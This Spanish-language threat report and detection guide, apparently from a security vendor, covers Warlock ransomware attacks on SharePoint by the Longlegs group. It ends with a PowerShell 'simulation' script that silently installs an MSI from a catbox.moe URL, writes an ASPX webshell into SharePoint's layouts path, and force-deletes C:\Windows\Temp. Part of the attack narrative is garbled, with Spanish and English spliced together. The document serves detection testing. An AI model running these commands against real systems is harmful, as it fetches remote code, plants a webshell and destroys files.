Ataques de Ransomware Warlock a Infraestructura Crítica de Agua y Telecomunicaciones
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un actor de amenaza con nexos en China, rastreado como Longlegs, está desplegando ransomware Warlock mediante la explotación de vulnerabilidades de Microsoft SharePoint. El grupo utiliza una cadena de explotación ToolShell para el acceso inicial antes de moverse lateralmente a través de las redes comprometidas. Los atacantes también aplican técnicas avanzadas de evasión, incluyendo el abuso de controladores vulnerables para deshabilitar software de seguridad y el aprovechamiento de servicios en la nube legítimos para la entrega de cargas útiles.
Investigación
La investigación rastreó la actividad desde la explotación inicial de SharePoint hasta el despliegue de un webshell dentro del directorio LAYOUTS. Los analistas observaron el uso de claves de máquina ASP.NET forjadas para la ejecución remota de código y el ransomware preparado en el recurso compartido SYSVOL para la distribución a nivel de dominio. La cadena de ataque también involucró la carga lateral de DLL y el abuso de la funcionalidad de tunelización de Visual Studio Code para el acceso persistente.
Mitigación
Las organizaciones deben priorizar el parcheo del servidor Microsoft SharePoint para remediar las vulnerabilidades de ToolShell conocidas. La aplicación de controles estrictos sobre controladores firmados pero vulnerables puede ayudar a prevenir ataques BYOVD. Los equipos de seguridad también deben monitorear el uso anómalo de herramientas residuales y restringir el acceso al recurso compartido SYSVOL para actividades no administrativas para reducir el movimiento lateral y el despliegue de ransomware.
Respuesta
Cuando se detecta actividad maliciosa, los respondedores de incidentes deben aislar los servidores SharePoint afectados e inspeccionar el recurso compartido SYSVOL en busca de scripts o binarios no autorizados. Realizar una auditoría exhaustiva de las cuentas de dominio, enfocándose en adiciones no autorizadas al grupo de Administradores locales. Revisar el tráfico de red en busca de conexiones salientes a servicios de intercambio de archivos como catbox.moe o wasabisys.com utilizados para preparar cargas útiles.
Flujo de Ataque
Detecciones
Agregar Usuario a Administradores Locales (a través de línea de comandos)
Descarga o Carga vía Powershell (a través de línea de comandos)
Cadenas de Powershell Sospechosas (a través de línea de comandos)
Llamar Clases/Métodos .NET Sospechosos desde la Línea de Comandos de Powershell (a través de creación de procesos)
Posible Descubrimiento de Recursos Compartidos de Red (a través de línea de comandos)
Descubrimiento de Confianzas de Dominio Sospechosas (a través de línea de comandos)
Posible Intento de Instalación de Archivo MSI Remoto (a través de línea de comandos)
Ejecución Sospechosa desde Perfil de Usuario Público (a través de creación de procesos)
Cadenas de Powershell Sospechosas (a través de powershell)
Llamar Métodos .NET Sospechosos desde Powershell (a través de powershell)
Posible Creación de Webshell en Directorios de Microsoft Exchange / SharePoint (a través de evento de archivo)
Archivos Sospechosos en Perfil de Usuario Público (a través de evento de archivo)
Posible Infiltración / Exfiltración de Datos / C2 vía Servicios / Herramientas de Terceros (a través de proxy)
Posible Infiltración / Exfiltración de Datos / C2 vía Servicios / Herramientas de Terceros (a través de dns)
Comando y Control Sospechoso por Solicitud a Dominio de Interacciones Out-of-Band (a través de dns)
IOCs (HashSha256) para detectar: Atacantes de Ransomware Warlock Afectan a Operadores de Agua y Telecomunicaciones
Detección de Comando Malicioso de PowerShell para Ejecución de Código [Windows Powershell]
Etapa y Ejecución de Ransomware Warlock vía Recursos Compartidos de Red [Evento de Archivo de Windows]
Indicadores de Ransomware Warlock en Servidores SharePoint [Creación de Procesos de Windows]
Ejecución de Simulación
Requisito previo: La Verificación Previa de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y buscar generar exactamente la telemetría esperada por la lógica de detección. Los ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.
-
Narrativa & Comandos de Ataque: El adversario pretende desplegar ransomware Warlock en un servidor SharePoint. El ataque comienza usando
msiexecpara extraer un MSI malicioso de un dominio controlado por el atacante (catbox.moe). Después de la incursión inicial, el atacante usa PowerShell para escribir un web shell ASPX malicioso en elcamino de layout2sp.aspx de SharePoint usando una carga útil codificada en Base64 para evitar filtros de cadena simples. Finalmente, el atacante intenta cargar un ensamblado .NET malicioso directamente en la memoria usandopath using a Base64 encoded payload to bypass simple string filters. Finally, the attacker attempts to load a malicious .NET assembly directly into memory usingSystem.Workflow.ComponentModelpara ejecutar código sin dejar huellas en el disco. -
Script de Prueba de Regresión:
# Guion de Simulación de Ransomware Warlock # NOTA: Este script es solo para propósitos de prueba autorizados. Write-Host "[!] Iniciando Simulación de Ransomware Warlock..." -ForegroundColor Red # 1. Simular Descarga Remota de MSIEXEC (Selección 3) Write-Host "[*] Simulando descarga remota de carga útil MSIEXEC..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. Simular Descarga de Web Shell ASPX vía PowerShell (Selección 1) # Usamos la cadena exacta de la regla para asegurar la detección Write-Host "[*] Simulando la descarga de web shell vía Base64..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. Simular Carga Refleja de Ensamblados (Selección 2) Write-Host "[*] Simulando Carga Refleja de Ensamblado..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] Comandos de simulación enviados." -ForegroundColor Green -
Comandos de Limpieza:
# Script de limpieza para remover cualquier artefacto creado durante la simulación Write-Host "[!] Limpiando artefactos de la simulación..." -ForegroundColor Yellow # Eliminar archivos simulados (Nota: En una prueba real, apuntarías a las rutas específicas creadas) # Dado que usamos cadenas básicas, principalmente aseguramos que no se hayan generado archivos maliciosos reales. Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Limpieza completa." -ForegroundColor Green